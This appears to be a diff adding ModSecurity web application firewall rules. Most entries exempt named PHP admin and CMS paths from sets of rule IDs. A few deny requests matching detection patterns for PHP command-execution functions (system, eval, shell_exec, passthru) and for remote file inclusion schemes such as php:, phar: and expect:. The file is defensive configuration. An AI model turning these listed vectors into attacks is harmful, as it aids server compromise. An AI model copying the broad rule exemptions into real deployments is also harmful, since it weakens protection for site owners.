+SecRule REQUEST_FILENAME "/editimage\.html" "phase:2,id:91850,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/siteprefs\.php" "phase:2,id:91851,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/admin/include/update\.php" "phase:2,id:91852,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/directory\.php" "phase:2,id:91853,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/video_add\.php" "phase:2,id:91854,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"
+
+SecRule REQUEST_FILENAME "/admin/products/entry/index\.php" "phase:2,id:91855,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/editconfirm\.php" "phase:2,id:91856,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/connectors/element/snippet\.php" "phase:2,id:91857,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340016"
+SecAction "phase:2,id:91858,t:none,pass,nolog,skipAfter:END_RULES_91858"
+
+
+SecRule REQUEST_URI|ARGS "< ?\?" 	"t:none,t:urlDecodeUni,t:lowercase,phase:2,deny,log,auditlog,status:403,capture,chain,id:361128,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|!ARGS:view|!ARGS:payment_extrainfo|!ARGS:solution|!ARGS:snippet|!ARGS:resolution|!ARGS:message|!ARGS:/template/|!ARGS:msg|!ARGS:/php/|!ARGS:gen_header|!ARGS:/layout/|!ARGS:post|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:footerfile|!ARGS:/descr/|!ARGS:titleMetatags|!ARGS:/content/|!ARGS:/^eip_/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|php_uname|popen|proc_open|shell_exec|mysql_query|eval|create_function|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+) ?\(|system\( ?getenv ?\( ?http_php ?\) ?\))"
+
+
+SecMarker END_RULES_91858
+
+SecRule REQUEST_FILENAME "/plugins/podpress/podpress_backend\.ph" "phase:2,id:91859,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/productos_edit\.php" "phase:2,id:91860,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/produto_script\.php" "phase:2,id:91861,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/db_structure\.php" "phase:2,id:91862,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:91863,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/hades_framework/option_panel/ajax\.php" "phase:2,id:91864,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91865,t:none,pass,nolog,skipAfter:END_RULES_91865"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/values/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:361129,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/values/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:361130,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91865
+
+SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:91866,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095"
+SecAction "phase:2,id:91867,t:none,pass,nolog,skipAfter:END_RULES_91867"
+
+SecRule ARGS "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|serialize|php_uname|phpinfo|preg_\w+|shell_exec|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:361131,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91867
+
+SecRule REQUEST_FILENAME "/s_listing\.php" "phase:2,id:91868,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/module-inventory/" "phase:2,id:91869,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/items_name_result\.php" "phase:2,id:91870,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/webmail/src/addressbook\.php" "phase:2,id:91871,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:91872,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159"
+
+SecRule REQUEST_FILENAME "/s_search\.php" "phase:2,id:91873,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cpage\.php" "phase:2,id:91874,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/display_property\.aspx" "phase:2,id:91875,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/admin-stats\.php" "phase:2,id:91876,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/quickscan/8a\.php" "phase:2,id:91877,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/creatematchstats\.php" "phase:2,id:91878,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/add-process\.php" "phase:2,id:91879,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"
+
+SecRule REQUEST_FILENAME "/admin/pages/updates\.php" "phase:2,id:91880,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/login_status\.php" "phase:2,id:91881,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91882,t:none,pass,nolog,skipAfter:END_RULES_91882"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:next|!ARGS:origin|!ARGS:no_session|!ARGS:no_user|!ARGS:ok_session "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:362129,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:next|!ARGS:origin|!ARGS:no_session|!ARGS:no_user|!ARGS:ok_session "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:362130,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91882
+
+SecRule REQUEST_FILENAME "/db_search\.php" "phase:2,id:91883,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/gravityforms/preview\.php" "phase:2,id:91884,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91885,t:none,pass,nolog,skipAfter:END_RULES_91885"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/input/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:362131,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/input/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:362132,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91885
+
+SecRule REQUEST_FILENAME "/admin/contmin\.php" "phase:2,id:91886,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/add_static_cgi\.php" "phase:2,id:91887,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"
+
+SecRule REQUEST_FILENAME "/ash/default\.php" "phase:2,id:91888,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ratesadmin\.php" "phase:2,id:91889,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/testamin\.php" "phase:2,id:91890,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/dartiframe\.html" "phase:2,id:91891,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/jomsocial/profile/edit" "phase:2,id:91892,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/administratie/pro/servers\.php" "phase:2,id:91893,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/payment\.php" "phase:2,id:91894,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:91895,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/pages/update\.php" "phase:2,id:91896,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/administrator/options\.php" "phase:2,id:91897,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/modules/catalogs/save_element\.php" "phase:2,id:91898,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin_modal/save/" "phase:2,id:91899,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/favicon\.php" "phase:2,id:91900,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/components\.php" "phase:2,id:91901,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/postbagdo\.php" "phase:2,id:91902,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wp-admin/media\.php" "phase:2,id:91903,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/administrator/index3\.php" "phase:2,id:91904,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/portaladmin/edit_annonce1\.php" "phase:2,id:91905,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
+
+SecRule REQUEST_FILENAME "/portaladmin/add_annonce1\.php" "phase:2,id:91906,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
+
+SecRule REQUEST_FILENAME "/cms_centralparking\.php" "phase:2,id:91907,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/save_lesson\.php" "phase:2,id:91908,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/e_brochure_edit\.php" "phase:2,id:91909,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/aboutus-pages_exe\.php" "phase:2,id:91910,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/tbl_alter\.php" "phase:2,id:91911,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/newspro\.cgi" "phase:2,id:91912,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/video_edit\.php" "phase:2,id:91913,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
